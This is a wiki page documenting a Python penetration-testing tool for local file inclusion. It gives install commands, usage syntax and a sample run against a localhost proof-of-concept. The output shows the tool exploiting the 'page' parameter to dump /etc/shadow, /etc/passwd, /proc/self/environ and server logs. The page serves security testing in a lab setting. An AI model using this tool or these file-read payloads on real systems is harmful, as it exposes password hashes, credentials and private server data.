Simple-Local-File-Inclusion-Exploiter

From aldeid
Jump to: navigation, search

Description

Simple Local File Inclusion Exploiter is a Python script that enables to identify if a page is vulnerable to Local File Inclusions (LFI) attacks.

Installation

$ mkdir -p /pentest/web/lfi-sploiter/
$ cd /pentest/web/lfi-sploiter/
$ wget http://packetstorm.linuxsecurity.com/UNIX/scanners/lfi_sploiter.py.txt
$ mv lfi_sploiter.py.txt lfi_sploiter.py

Usage

Syntax

$ python lfi_sploiter.py \
--exploit-url="<http://url>" \
--vulnerable-parameter="<parameter>"

Options

Both options are mandatory:

--exploit-url="<url>"
URL to exploit (e.g. --exploit-url="http://192.168.1.1/index.php?page=1")
--vulnerable-parameter="<param>"
Name of the parameter to exploit (e.g. --vulnerable-parameter="page")

Example

The following example is a proof of concept tested against a vulnerable specific code, that you can download here.

$ python lfi_sploiter.py --exploit-url="http://localhost/poc/LFI/index.php?page=1" \
--vulnerable-parameter="page"

Simple Local File Inclusion Exploiter
by Valentin Hoebel (valentin ( a t ) xenuser ( d o t ) org)

Version 1.0 (21th November 2010)  ^__^
                                  (oo)\________
                                  (__)\        )\/\ 
                                      ||----w |
Power to teh cows!                    ||     ||
____________________________________________________

[i] Provided URL to exploit: http://localhost/poc/LFI/index.php?page=1
[i] Provided vulnerable parameter: page

[i] Assuming the provided data was correct.
[i] Trying to establish a connection with a random user agent...
[i] Connected to target! URL seems to be valid.
[i] Jumping to the exploit feature.

[i] For exploiting the LFI vulnerability we need to split the URL into its parts.
[i] IP address / domain: localhost
[i] Script: /poc/LFI/index.php
[i] URL query string: page=1

[i] It seems that the URL contains at least one parameter.
[i] Trying to find also other parameters...
[i] No other parameters were found.
[i] The following 1 parameter(s) was/were found:
[i] {'page': '1'}

[i] According to you, the vulnerable parameter should be: page
[i] Checking if this parameter exists in the provided URL...
[i] Found your vulnerable parameter in the URL.

[i] Now trying to find out how this LFI vulnerability can be exploited...
[i] This can take a while.
[+] Found signs of a successfull LFI vulnerability! No nullbyte was required.
[+] URL: http://localhost/poc/LFI/index.php?page=/etc/passwd

[i] Exploiting the LFI vulnerability starts right now.
[i] Trying to dump some interesting files to your local hard disk...
[+] Dumping file: /etc/passwd
[+] Dumping file: /proc/self/environ
[+] Dumping file: /var/log/apache2/access.log
[+] Dumping file: /var/log/apache2/error.log
[+] Dumping file: /etc/shadow
[+] Dumping file: /etc/group
[+] Dumping file: /var/log/auth.log
[+] Dumping file: /proc/self/status
[+] Dumping file: /proc/self/mounts
[+] Dumping file: /proc/cpuinfo
[+] Dumping file: /proc/meminfo
[i] Hint: The files are also dumped when we have no permission to view them.
[i] Instead of the file, the PHP error message will be dumped.

[i] Completed the task. Will now exit!
[i] I know, there is more about LFI than it is covered here, but this will be implemented in later versions of this tool.
[i] Feel free to send in some feedback!

Comments

Talk:Simple-Local-File-Inclusion-Exploiter